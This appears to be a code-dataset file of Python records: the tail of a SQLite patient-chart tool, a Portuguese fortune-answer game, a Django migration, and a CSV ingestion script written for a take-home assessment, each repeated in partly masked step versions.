try:\n c.execute('''INSERT INTO patients VALUES\n (?,?,?,?,?,?);''',(hcno, name, age_group, address, phone, emg_phone))\n CONN.commit()\n print(\"Patient record created.\")\n except:\n print(\"Invalid entry, patient already exists\")\n\ndef addChart(CONN, staff, patient):\n c = CONN.cursor()\n #phcno = input(\"Please enter patient health care #: \")\n c.execute(\"SELECT chart_id FROM charts ORDER BY chart_id DESC LIMIT 1;\")\n last_chart = c.fetchone()\n if last_chart[0] is not None:\n new_chart_id = int(last_chart[0])+1\n else:\n new_chart_id = '00001'\n\n c.execute('''INSERT INTO charts VALUES\n (?,?, DateTime('now','localtime'), ?);''', (new_chart_id, patient[0], None))\n c.execute(\"SELECT * FROM charts WHERE hcno = ? ORDER BY adate DESC LIMIT 1;\", (patient[0],))\n CONN.commit()\n\n print(\"A new chart had been create. 
Chart ID: \"+ str(new_chart_id))\n return patientChart(CONN, staff, patient)\n",
"step-ids": [
7,
9,
11,
12,
13
]
}
|
[
7,
9,
11,
12,
13
] |
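Every INSERT and UPDATE in the chart-handling record above goes through sqlite3 '?' parameter binding rather than string formatting. A minimal, self-contained sketch of that pattern, assuming an in-memory table (names and values here are illustrative, not the hospital schema):

import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE symptoms (hcno TEXT, note TEXT, ts TEXT)')
# '?' placeholders let the driver escape the values; DateTime('now','localtime')
# mirrors the timestamp expression the insert helpers above pass to SQLite.
conn.execute("INSERT INTO symptoms VALUES (?, ?, DateTime('now','localtime'))",
             ('123', 'headache'))
conn.commit()
print(conn.execute('SELECT * FROM symptoms').fetchall())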
from random import randint
# functions
def leialetra():
'''
    => Function to validate letters.
    msg: receives string input, either Ss or Nn.
    return: a string with value S.
'''
while True:
try:
msg = str(input('Deseja fazer uma pergunta? [s/n] ')).upper()[0]
except KeyboardInterrupt:
print('O usuário desistiu de inserir um dado!')
break
except IndexError:
print('ERRO, nada digitado!')
else:
if msg not in 'SsNn' or msg in ' ':
print('ERRO, DADO INVALIDO!')
else:
if msg in 'Nn':
print('Volte sempre, Obrigado!')
break
else:
return 'S'
break
def facapergunta():
msg = str(input('Faça sua pergunta: ')).upper().strip().replace(' ','')
if msg.isnumeric():
return 'N'
else:
return 'L'
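# Hypothetical behavior note (the inputs are made up): because the question is
# squeezed of spaces and checked with isnumeric(), a question typed as digits
# only, e.g. '123', returns 'N' and ends the main loop below, while any text
# containing letters returns 'L' and receives a random answer.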
# main program
resposta = ["Sim", "Não", "Talvez", "Por que não?", "Vá", "Não sei", "Pode ser", "Talvez sim", "Talvez não", "Tenha Fé"]
while True:
aleatorio = randint(0, 9)
escolha = leialetra()
if escolha == 'S':
pergunta = facapergunta()
if pergunta == 'L':
print(resposta[aleatorio])
else:
break
|
normal
|
{
"blob_id": "1fff681363c4c91c47c2818681a3f2f125dd8c83",
"index": 2022,
"step-1": "<mask token>\n\n\ndef leialetra():\n \"\"\"\n =>Função para validar letras.\n parm=msg: Recebe dados to tipo string sendo Ss ou Nn.\n return: String de valor S.\n \"\"\"\n while True:\n try:\n msg = str(input('Deseja fazer uma pergunta? [s/n] ')).upper()[0]\n except KeyboardInterrupt:\n print('O usuário desistiu de inserir um dado!')\n break\n except IndexError:\n print('ERRO, nada digitado!')\n else:\n if msg not in 'SsNn' or msg in ' ':\n print('ERRO, DADO INVALIDO!')\n elif msg in 'Nn':\n print('Volte sempre, Obrigado!')\n break\n else:\n return 'S'\n break\n\n\ndef facapergunta():\n msg = str(input('Faça sua pergunta: ')).upper().strip().replace(' ', '')\n if msg.isnumeric():\n return 'N'\n else:\n return 'L'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef leialetra():\n \"\"\"\n =>Função para validar letras.\n parm=msg: Recebe dados to tipo string sendo Ss ou Nn.\n return: String de valor S.\n \"\"\"\n while True:\n try:\n msg = str(input('Deseja fazer uma pergunta? [s/n] ')).upper()[0]\n except KeyboardInterrupt:\n print('O usuário desistiu de inserir um dado!')\n break\n except IndexError:\n print('ERRO, nada digitado!')\n else:\n if msg not in 'SsNn' or msg in ' ':\n print('ERRO, DADO INVALIDO!')\n elif msg in 'Nn':\n print('Volte sempre, Obrigado!')\n break\n else:\n return 'S'\n break\n\n\ndef facapergunta():\n msg = str(input('Faça sua pergunta: ')).upper().strip().replace(' ', '')\n if msg.isnumeric():\n return 'N'\n else:\n return 'L'\n\n\n<mask token>\nwhile True:\n aleatorio = randint(0, 9)\n escolha = leialetra()\n if escolha == 'S':\n pergunta = facapergunta()\n if pergunta == 'L':\n print(resposta[aleatorio])\n else:\n break\n",
"step-3": "<mask token>\n\n\ndef leialetra():\n \"\"\"\n =>Função para validar letras.\n parm=msg: Recebe dados to tipo string sendo Ss ou Nn.\n return: String de valor S.\n \"\"\"\n while True:\n try:\n msg = str(input('Deseja fazer uma pergunta? [s/n] ')).upper()[0]\n except KeyboardInterrupt:\n print('O usuário desistiu de inserir um dado!')\n break\n except IndexError:\n print('ERRO, nada digitado!')\n else:\n if msg not in 'SsNn' or msg in ' ':\n print('ERRO, DADO INVALIDO!')\n elif msg in 'Nn':\n print('Volte sempre, Obrigado!')\n break\n else:\n return 'S'\n break\n\n\ndef facapergunta():\n msg = str(input('Faça sua pergunta: ')).upper().strip().replace(' ', '')\n if msg.isnumeric():\n return 'N'\n else:\n return 'L'\n\n\nresposta = ['Sim', 'Não', 'Talvez', 'Por que não?', 'Vá', 'Não sei',\n 'Pode ser', 'Talvez sim', 'Talvez não', 'Tenha Fé']\nwhile True:\n aleatorio = randint(0, 9)\n escolha = leialetra()\n if escolha == 'S':\n pergunta = facapergunta()\n if pergunta == 'L':\n print(resposta[aleatorio])\n else:\n break\n",
"step-4": "from random import randint\n\n\ndef leialetra():\n \"\"\"\n =>Função para validar letras.\n parm=msg: Recebe dados to tipo string sendo Ss ou Nn.\n return: String de valor S.\n \"\"\"\n while True:\n try:\n msg = str(input('Deseja fazer uma pergunta? [s/n] ')).upper()[0]\n except KeyboardInterrupt:\n print('O usuário desistiu de inserir um dado!')\n break\n except IndexError:\n print('ERRO, nada digitado!')\n else:\n if msg not in 'SsNn' or msg in ' ':\n print('ERRO, DADO INVALIDO!')\n elif msg in 'Nn':\n print('Volte sempre, Obrigado!')\n break\n else:\n return 'S'\n break\n\n\ndef facapergunta():\n msg = str(input('Faça sua pergunta: ')).upper().strip().replace(' ', '')\n if msg.isnumeric():\n return 'N'\n else:\n return 'L'\n\n\nresposta = ['Sim', 'Não', 'Talvez', 'Por que não?', 'Vá', 'Não sei',\n 'Pode ser', 'Talvez sim', 'Talvez não', 'Tenha Fé']\nwhile True:\n aleatorio = randint(0, 9)\n escolha = leialetra()\n if escolha == 'S':\n pergunta = facapergunta()\n if pergunta == 'L':\n print(resposta[aleatorio])\n else:\n break\n",
"step-5": "from random import randint\n\n#funções\ndef leialetra():\n '''\n =>Função para validar letras.\n parm=msg: Recebe dados to tipo string sendo Ss ou Nn.\n return: String de valor S.\n '''\n while True:\n try:\n msg = str(input('Deseja fazer uma pergunta? [s/n] ')).upper()[0]\n except KeyboardInterrupt:\n print('O usuário desistiu de inserir um dado!')\n break\n except IndexError:\n print('ERRO, nada digitado!')\n else:\n if msg not in 'SsNn' or msg in ' ':\n print('ERRO, DADO INVALIDO!')\n else:\n if msg in 'Nn':\n print('Volte sempre, Obrigado!')\n break\n else:\n return 'S'\n break\n\ndef facapergunta():\n msg = str(input('Faça sua pergunta: ')).upper().strip().replace(' ','')\n if msg.isnumeric():\n return 'N'\n else:\n return 'L'\n\n\n#programa principal\nresposta = [\"Sim\", \"Não\", \"Talvez\", \"Por que não?\", \"Vá\", \"Não sei\", \"Pode ser\", \"Talvez sim\", \"Talvez não\", \"Tenha Fé\"]\n\nwhile True:\n aleatorio = randint(0, 9)\n escolha = leialetra()\n if escolha == 'S':\n pergunta = facapergunta()\n if pergunta == 'L':\n print(resposta[aleatorio])\n else:\n break\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
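A minimal variant of the answer-selection step in the record above, assuming only the standard library: random.choice draws directly from the list, removing the hard-coded randint(0, 9) bound that must be kept in sync with len(resposta).

from random import choice

resposta = ['Sim', 'Não', 'Talvez']  # abbreviated list, for illustration only
# choice() stays correct for any non-empty list length.
print(choice(resposta))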
# Generated by Django 2.0.3 on 2018-04-30 16:25
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('threads', '0007_auto_20180430_1617'),
]
operations = [
migrations.AlterField(
model_name='thread',
name='last_activity',
field=models.DateTimeField(default=django.utils.timezone.now),
),
]
|
normal
|
{
"blob_id": "6cd250b3bffd87657ec7cc28eaffe817c6d9f73f",
"index": 9794,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('threads', '0007_auto_20180430_1617')]\n operations = [migrations.AlterField(model_name='thread', name=\n 'last_activity', field=models.DateTimeField(default=django.utils.\n timezone.now))]\n",
"step-4": "from django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n dependencies = [('threads', '0007_auto_20180430_1617')]\n operations = [migrations.AlterField(model_name='thread', name=\n 'last_activity', field=models.DateTimeField(default=django.utils.\n timezone.now))]\n",
"step-5": "# Generated by Django 2.0.3 on 2018-04-30 16:25\n\nfrom django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('threads', '0007_auto_20180430_1617'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='thread',\n name='last_activity',\n field=models.DateTimeField(default=django.utils.timezone.now),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
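The AlterField above passes the callable django.utils.timezone.now itself, not its result. A sketch of the model state this migration implies (the Thread class body is an assumption; only the last_activity field comes from the migration):

from django.db import models
from django.utils import timezone

class Thread(models.Model):
    # The callable is evaluated per row at save time; writing timezone.now()
    # instead would bake one import-time timestamp into every new row.
    last_activity = models.DateTimeField(default=timezone.now)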
<|reserved_special_token_0|>
class DataSource:
def __init__(self, name, usableRows, errorRows, indices):
self.name = name
self.usableRows = usableRows
self.errorRows = errorRows
self.indices = indices
def getHeaderIndexes(indices, headers):
counter = -1
a, b, c, d, e, f, g = False, False, False, False, False, False, False
for header in headers:
counter += 1
if header.strip() == 'Provider Name':
a = True
indices['Provider Name'] = counter
elif header.strip() == 'CampaignID':
b = True
indices['CampaignID'] = counter
elif header.strip() == 'Cost Per Ad Click':
c = True
indices['Cost Per Ad Click'] = counter
elif header.strip() == 'Redirect Link':
d = True
indices['Redirect Link'] = counter
elif header.strip() == 'Phone Number':
e = True
indices['Phone Number'] = counter
elif header.strip() == 'Address':
f = True
indices['Address'] = counter
elif header.strip() == 'Zipcode':
g = True
indices['Zipcode'] = counter
if (a == True and b == True and c == True and d == True and e == True and
f == True and g == True):
valid = True
else:
valid = False
return indices, valid
<|reserved_special_token_0|>
def addUsableRow(indices, row, finalOutput):
pn = row[indices['Provider Name']].strip('"')
cid = row[indices['CampaignID']].strip('"')
cpac = row[indices['Cost Per Ad Click']].strip('"')
rl = row[indices['Redirect Link']].strip('"')
if row[indices['Phone Number']] == '':
phn = 'NULL'
else:
phn = row[indices['Phone Number']].strip('"')
ad = row[indices['Address']].strip('"')
zc = row[indices['Zipcode']].strip('"')
temp = ('"' + pn + '","' + cid + '","' + cpac + '","' + rl + '","' +
phn + '","' + ad + '","' + zc + '"' + '\n')
finalOutput += temp
return finalOutput
def addErrorRow(indices, row, errorFinalOutput):
temp = 'Error: ' + '\n'
for thing in row:
temp += thing + ','
temp = temp[:-1]
temp += '\n'
errorFinalOutput += temp
return errorFinalOutput
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataSource:
def __init__(self, name, usableRows, errorRows, indices):
self.name = name
self.usableRows = usableRows
self.errorRows = errorRows
self.indices = indices
def getHeaderIndexes(indices, headers):
counter = -1
a, b, c, d, e, f, g = False, False, False, False, False, False, False
for header in headers:
counter += 1
if header.strip() == 'Provider Name':
a = True
indices['Provider Name'] = counter
elif header.strip() == 'CampaignID':
b = True
indices['CampaignID'] = counter
elif header.strip() == 'Cost Per Ad Click':
c = True
indices['Cost Per Ad Click'] = counter
elif header.strip() == 'Redirect Link':
d = True
indices['Redirect Link'] = counter
elif header.strip() == 'Phone Number':
e = True
indices['Phone Number'] = counter
elif header.strip() == 'Address':
f = True
indices['Address'] = counter
elif header.strip() == 'Zipcode':
g = True
indices['Zipcode'] = counter
if (a == True and b == True and c == True and d == True and e == True and
f == True and g == True):
valid = True
else:
valid = False
return indices, valid
def isRowValid(indices, row):
sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',
'Zipcode']
for column in sNNs:
currentCheck = row[indices[column]].strip()
if isinstance(currentCheck, str) and len(currentCheck
) > 0 and currentCheck != 'NULL':
pass
else:
return False
fNNs = ['Cost Per Ad Click']
for column in fNNs:
currentCheck = row[indices[column]].strip('"')
currentCheck = currentCheck.strip("'")
try:
float(currentCheck)
except:
return False
sNs = ['Phone Number']
return True
def addUsableRow(indices, row, finalOutput):
pn = row[indices['Provider Name']].strip('"')
cid = row[indices['CampaignID']].strip('"')
cpac = row[indices['Cost Per Ad Click']].strip('"')
rl = row[indices['Redirect Link']].strip('"')
if row[indices['Phone Number']] == '':
phn = 'NULL'
else:
phn = row[indices['Phone Number']].strip('"')
ad = row[indices['Address']].strip('"')
zc = row[indices['Zipcode']].strip('"')
temp = ('"' + pn + '","' + cid + '","' + cpac + '","' + rl + '","' +
phn + '","' + ad + '","' + zc + '"' + '\n')
finalOutput += temp
return finalOutput
def addErrorRow(indices, row, errorFinalOutput):
temp = 'Error: ' + '\n'
for thing in row:
temp += thing + ','
temp = temp[:-1]
temp += '\n'
errorFinalOutput += temp
return errorFinalOutput
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataSource:
def __init__(self, name, usableRows, errorRows, indices):
self.name = name
self.usableRows = usableRows
self.errorRows = errorRows
self.indices = indices
def getHeaderIndexes(indices, headers):
counter = -1
a, b, c, d, e, f, g = False, False, False, False, False, False, False
for header in headers:
counter += 1
if header.strip() == 'Provider Name':
a = True
indices['Provider Name'] = counter
elif header.strip() == 'CampaignID':
b = True
indices['CampaignID'] = counter
elif header.strip() == 'Cost Per Ad Click':
c = True
indices['Cost Per Ad Click'] = counter
elif header.strip() == 'Redirect Link':
d = True
indices['Redirect Link'] = counter
elif header.strip() == 'Phone Number':
e = True
indices['Phone Number'] = counter
elif header.strip() == 'Address':
f = True
indices['Address'] = counter
elif header.strip() == 'Zipcode':
g = True
indices['Zipcode'] = counter
if (a == True and b == True and c == True and d == True and e == True and
f == True and g == True):
valid = True
else:
valid = False
return indices, valid
def isRowValid(indices, row):
sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',
'Zipcode']
for column in sNNs:
currentCheck = row[indices[column]].strip()
if isinstance(currentCheck, str) and len(currentCheck
) > 0 and currentCheck != 'NULL':
pass
else:
return False
fNNs = ['Cost Per Ad Click']
for column in fNNs:
currentCheck = row[indices[column]].strip('"')
currentCheck = currentCheck.strip("'")
try:
float(currentCheck)
except:
return False
sNs = ['Phone Number']
return True
def addUsableRow(indices, row, finalOutput):
pn = row[indices['Provider Name']].strip('"')
cid = row[indices['CampaignID']].strip('"')
cpac = row[indices['Cost Per Ad Click']].strip('"')
rl = row[indices['Redirect Link']].strip('"')
if row[indices['Phone Number']] == '':
phn = 'NULL'
else:
phn = row[indices['Phone Number']].strip('"')
ad = row[indices['Address']].strip('"')
zc = row[indices['Zipcode']].strip('"')
temp = ('"' + pn + '","' + cid + '","' + cpac + '","' + rl + '","' +
phn + '","' + ad + '","' + zc + '"' + '\n')
finalOutput += temp
return finalOutput
def addErrorRow(indices, row, errorFinalOutput):
temp = 'Error: ' + '\n'
for thing in row:
temp += thing + ','
temp = temp[:-1]
temp += '\n'
errorFinalOutput += temp
return errorFinalOutput
finalOutput = (
'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode'
+ '\n')
errorFinalOutput = ''
outputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()
) + '.csv'
pickelFileName = 'pickle/' + str(date.today())
pickleDict = {}
maxLines = 99999
dataSources = []
indices = {'Provider Name': 0, 'CampaignID': 0, 'Cost Per Ad Click': 0,
'Redirect Link': 0, 'Phone Number': 0, 'Address': 0, 'Zipcode': 0}
inputDirectory = 'inputFiles'
currentLines = 0
for file in os.listdir(inputDirectory):
currentLines += sum(1 for line in open(inputDirectory + '/' + file))
if currentLines > maxLines:
sys.exit('Error: Too many lines')
if file[-3:] != 'csv':
sys.exit('Error: Given file not a .csv file')
for file in os.listdir(inputDirectory):
usableRows = 0
errorRows = 0
with open(inputDirectory + '/' + file, newline='') as f:
reader = csv.reader(f)
try:
headers = next(reader)
except:
headers = ''
indicesCurrent, valid = getHeaderIndexes(indices, headers)
if valid == True:
for row in reader:
if isRowValid(indicesCurrent, row):
finalOutput = addUsableRow(indicesCurrent, row, finalOutput
)
usableRows += 1
else:
errorFinalOutput = addErrorRow(indicesCurrent, row,
errorFinalOutput)
errorRows += 1
pickleDict[file] = indicesCurrent
else:
for row in reader:
errorFinalOutput = addErrorRow(indicesCurrent, row,
errorFinalOutput)
errorRows += 1
f.close()
newDataSource = DataSource(file, usableRows, errorRows, indices)
dataSources.append(newDataSource)
with open(outputFileName, 'w+') as f:
f.write(finalOutput)
f.close()
print(errorFinalOutput)
with open(pickelFileName, 'wb') as f:
pickle.dump(dataSources, f)
f.close()
with open('pickle/masterDict', 'wb') as f:
pickle.dump(pickleDict, f)
f.close()
print(
'Thanks for taking the time to look at my code and consider me for this position. Cheers!'
)
<|reserved_special_token_1|>
import csv, os, sys, pickle
from datetime import date
class DataSource:
def __init__(self, name, usableRows, errorRows, indices):
self.name = name
self.usableRows = usableRows
self.errorRows = errorRows
self.indices = indices
def getHeaderIndexes(indices, headers):
counter = -1
a, b, c, d, e, f, g = False, False, False, False, False, False, False
for header in headers:
counter += 1
if header.strip() == 'Provider Name':
a = True
indices['Provider Name'] = counter
elif header.strip() == 'CampaignID':
b = True
indices['CampaignID'] = counter
elif header.strip() == 'Cost Per Ad Click':
c = True
indices['Cost Per Ad Click'] = counter
elif header.strip() == 'Redirect Link':
d = True
indices['Redirect Link'] = counter
elif header.strip() == 'Phone Number':
e = True
indices['Phone Number'] = counter
elif header.strip() == 'Address':
f = True
indices['Address'] = counter
elif header.strip() == 'Zipcode':
g = True
indices['Zipcode'] = counter
if (a == True and b == True and c == True and d == True and e == True and
f == True and g == True):
valid = True
else:
valid = False
return indices, valid
def isRowValid(indices, row):
sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',
'Zipcode']
for column in sNNs:
currentCheck = row[indices[column]].strip()
if isinstance(currentCheck, str) and len(currentCheck
) > 0 and currentCheck != 'NULL':
pass
else:
return False
fNNs = ['Cost Per Ad Click']
for column in fNNs:
currentCheck = row[indices[column]].strip('"')
currentCheck = currentCheck.strip("'")
try:
float(currentCheck)
except:
return False
sNs = ['Phone Number']
return True
def addUsableRow(indices, row, finalOutput):
pn = row[indices['Provider Name']].strip('"')
cid = row[indices['CampaignID']].strip('"')
cpac = row[indices['Cost Per Ad Click']].strip('"')
rl = row[indices['Redirect Link']].strip('"')
if row[indices['Phone Number']] == '':
phn = 'NULL'
else:
phn = row[indices['Phone Number']].strip('"')
ad = row[indices['Address']].strip('"')
zc = row[indices['Zipcode']].strip('"')
temp = ('"' + pn + '","' + cid + '","' + cpac + '","' + rl + '","' +
phn + '","' + ad + '","' + zc + '"' + '\n')
finalOutput += temp
return finalOutput
def addErrorRow(indices, row, errorFinalOutput):
temp = 'Error: ' + '\n'
for thing in row:
temp += thing + ','
temp = temp[:-1]
temp += '\n'
errorFinalOutput += temp
return errorFinalOutput
finalOutput = (
'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode'
+ '\n')
errorFinalOutput = ''
outputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()
) + '.csv'
pickelFileName = 'pickle/' + str(date.today())
pickleDict = {}
maxLines = 99999
dataSources = []
indices = {'Provider Name': 0, 'CampaignID': 0, 'Cost Per Ad Click': 0,
'Redirect Link': 0, 'Phone Number': 0, 'Address': 0, 'Zipcode': 0}
inputDirectory = 'inputFiles'
currentLines = 0
for file in os.listdir(inputDirectory):
currentLines += sum(1 for line in open(inputDirectory + '/' + file))
if currentLines > maxLines:
sys.exit('Error: Too many lines')
if file[-3:] != 'csv':
sys.exit('Error: Given file not a .csv file')
for file in os.listdir(inputDirectory):
usableRows = 0
errorRows = 0
with open(inputDirectory + '/' + file, newline='') as f:
reader = csv.reader(f)
try:
headers = next(reader)
except:
headers = ''
indicesCurrent, valid = getHeaderIndexes(indices, headers)
if valid == True:
for row in reader:
if isRowValid(indicesCurrent, row):
finalOutput = addUsableRow(indicesCurrent, row, finalOutput
)
usableRows += 1
else:
errorFinalOutput = addErrorRow(indicesCurrent, row,
errorFinalOutput)
errorRows += 1
pickleDict[file] = indicesCurrent
else:
for row in reader:
errorFinalOutput = addErrorRow(indicesCurrent, row,
errorFinalOutput)
errorRows += 1
f.close()
newDataSource = DataSource(file, usableRows, errorRows, indices)
dataSources.append(newDataSource)
with open(outputFileName, 'w+') as f:
f.write(finalOutput)
f.close()
print(errorFinalOutput)
with open(pickelFileName, 'wb') as f:
pickle.dump(dataSources, f)
f.close()
with open('pickle/masterDict', 'wb') as f:
pickle.dump(pickleDict, f)
f.close()
print(
'Thanks for taking the time to look at my code and consider me for this position. Cheers!'
)
<|reserved_special_token_1|>
#Created by Jake Hansen for Zebra interview take home assessment, July 2020.
import csv, os, sys, pickle
from datetime import date
#Class For storing information about each file generally. Helpful for future
#use cases to remember the indices from a file, if file has thousands of fields
#Also can be used as a log to store daily number of 'good' vs 'bad' rows
class DataSource:
def __init__(self, name, usableRows, errorRows, indices):
self.name = name
self.usableRows = usableRows
self.errorRows = errorRows
self.indices = indices
# getHeaderIndexes(indices, headers)
# Requires: Pre-populated indices dictionary, the header's row from a CSV file with
# naming convention conforming to the schema output from the directions
# Effects: Determines if file has the necessary columns to match the desired output
# schema
# Modifies: The indices variable, returning the correct indices within the csv row
def getHeaderIndexes(indices, headers):
counter = -1
    a, b, c, d, e, f, g = False, False, False, False, False, False, False
for header in headers:
counter += 1
if header.strip() == 'Provider Name':
a = True
indices['Provider Name'] = counter
elif header.strip() == 'CampaignID':
b = True
indices['CampaignID'] = counter
elif header.strip() == 'Cost Per Ad Click':
c = True
indices['Cost Per Ad Click'] = counter
elif header.strip() == 'Redirect Link':
d = True
indices['Redirect Link'] = counter
elif header.strip() == 'Phone Number':
e = True
indices['Phone Number'] = counter
elif header.strip() == 'Address':
f = True
indices['Address'] = counter
elif header.strip() == 'Zipcode':
g = True
indices['Zipcode'] = counter
if a == True and b == True and c == True and d == True and e == True and f == True and g == True:
valid = True
else:
valid = False
return indices, valid
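# Hypothetical call (the header list is illustrative, not from the input files):
# hdrs = ['CampaignID', 'Provider Name', 'Cost Per Ad Click', 'Redirect Link',
#         'Phone Number', 'Address', 'Zipcode']
# idx, ok = getHeaderIndexes(indices, hdrs)
# -> ok is True, idx['CampaignID'] == 0, idx['Provider Name'] == 1; a header
#    row missing any required column flips ok to False.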
# isRowValid(indices,row)
# Requires: a valid CSV file with columns necessary to match the expected output
# Effects: Determines if a single row should be added to the final output, or if
# the row is missing data / has incorrect data types for the field and thus
# will not be added to the output but instead printed out
# Modifies: N/A
def isRowValid(indices, row):
#String Non-Nullables
sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address', 'Zipcode']
for column in sNNs:
currentCheck = row[indices[column]].strip()
if isinstance(currentCheck, str) and len(currentCheck) > 0 and currentCheck != 'NULL':
pass
else:
return False
#Float Non Nullables
fNNs = ['Cost Per Ad Click']
for column in fNNs:
currentCheck = row[indices[column]].strip('"')
currentCheck = currentCheck.strip("'")
try:
float(currentCheck)
except:
return False
#String Nullables
sNs = ['Phone Number']
#No Check Required, because it can be nullable or a string. I do assume that
#it is required to have a "Phone Number" column, which is checked for in getHeaderIndexes
return True
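# Illustrative rows (assuming indices was filled from headers in schema order):
# isRowValid(indices, ['Acme','77','abc','http://x','','1 Main St','78701'])   # False: cost is not a float
# isRowValid(indices, ['Acme','77','1.25','http://x','','1 Main St','78701'])  # True: blank phone is allowed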
# addUsableRow(indices, row, finalOutput)
# Requires: The row is known to follow the output schema as specified in the requirements
# Effects: Adds row variables in the order specified in the output schema
# Modifies: the final output variable
def addUsableRow(indices, row, finalOutput):
pn = row[indices['Provider Name']].strip('"')
cid = row[indices['CampaignID']].strip('"')
cpac = row[indices['Cost Per Ad Click']].strip('"')
rl = row[indices['Redirect Link']].strip('"')
if row[indices['Phone Number']] == '':
phn = 'NULL'
else:
phn = row[indices['Phone Number']].strip('"')
ad = row[indices['Address']].strip('"')
zc = row[indices['Zipcode']].strip('"')
temp = '"'+ pn + '","' + cid + '","' + cpac + '","' + rl + '","' + phn + '","' + ad + '","' + zc + '"' + '\n'
finalOutput += temp
return finalOutput
# addErrorRow(indices, row, errorFinalOutput)
# Requires: The row does not follow the output schema
# Effects: adds the row to the error output variable that will be printed out
# Modifies: the error final output string which gets printed at the end of the daily
# job / procedure / script/ whatever The Zebra prefers to call these python data projects
def addErrorRow(indices, row, errorFinalOutput):
temp = 'Error: ' + '\n'
for thing in row:
temp += thing + ','
temp = temp[:-1]
temp += '\n'
errorFinalOutput += temp
return errorFinalOutput
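# Resulting accumulator shapes for one made-up row (the quoting comes from
# addUsableRow; the 'Error:' prefix from addErrorRow):
#   finalOutput      += "Acme","77","1.25","http://x","NULL","1 Main St","78701"
#   errorFinalOutput += Error:
#                       Acme,77,abc,http://x,,1 Main St,78701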
#Variables and data structures
finalOutput = 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode' + '\n'
errorFinalOutput = ''
# outputFileName = 'outputFilesTest/ZebraAssignmentOutput-' + str(date.today()) + '.csv'
outputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()) + '.csv'
pickelFileName = 'pickle/' + str(date.today())
# pickelFileName = 'pickleTest/' + str(date.today())
pickleDict = {}
maxLines = 99999
dataSources = []
indices = {
"Provider Name": 0,
"CampaignID": 0,
"Cost Per Ad Click": 0,
"Redirect Link": 0,
"Phone Number": 0,
"Address": 0,
"Zipcode": 0
}
#InputFiles in list form
# inputList = [
# 'inputFilesTest/Auto.csv',
# 'inputFilesTest/Home.csv'
# ]
# InputFiles in a directory
inputDirectory = 'inputFiles'
#check if files are too large, or non-csv files
currentLines = 0
for file in os.listdir(inputDirectory):
# for file in inputList:
# currentLines += sum(1 for line in open(file))
currentLines += sum(1 for line in open(inputDirectory + '/' + file))
if currentLines > maxLines:
sys.exit('Error: Too many lines')
if file[-3:] != 'csv':
sys.exit('Error: Given file not a .csv file')
#Main Algorithm loop through all files in the list
for file in os.listdir(inputDirectory):
# for file in inputList:
#usableRows and errorRows used for storing information from each data source
usableRows = 0
errorRows = 0
# with open(file, newline='') as f:
with open(inputDirectory + '/' + file, newline='') as f:
reader = csv.reader(f)
try:
headers = next(reader)
except:
headers = ''
indicesCurrent, valid = getHeaderIndexes(indices, headers)
if valid == True:
for row in reader:
if isRowValid(indicesCurrent, row):
finalOutput = addUsableRow(indicesCurrent,row, finalOutput)
usableRows += 1
else:
errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)
errorRows += 1
pickleDict[file] = indicesCurrent
else:
for row in reader:
errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)
errorRows += 1
f.close()
#Add dataSource Information for possible future needs and logging purposes
    newDataSource = DataSource(file, usableRows, errorRows, indices)
dataSources.append(newDataSource)
#Create file with rows containing correct schema
with open(outputFileName, 'w+') as f:
f.write(finalOutput)
f.close()
#print the incorrect rows
print(errorFinalOutput)
#Create Pickle file containing data source info for daily logging
with open(pickelFileName, 'wb') as f:
pickle.dump(dataSources, f)
f.close()
#Create Pickle File dictionary with indices specific info for filenames
with open('pickle/masterDict', 'wb') as f:
pickle.dump(pickleDict, f)
f.close()
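# Reading a day's log back (hypothetical follow-up, not part of this script):
# with open('pickle/' + str(date.today()), 'rb') as f:
#     for ds in pickle.load(f):
#         print(ds.name, ds.usableRows, ds.errorRows)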
#Thank you line
print("Thanks for taking the time to look at my code and consider me for this position. Cheers!")
|
flexible
|
{
"blob_id": "38c1b82a29a5ad0b4581e63fb083ca2487a79817",
"index": 9544,
"step-1": "<mask token>\n\n\nclass DataSource:\n\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a, b, c, d, e, f, g = False, False, False, False, False, False, False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if (a == True and b == True and c == True and d == True and e == True and\n f == True and g == True):\n valid = True\n 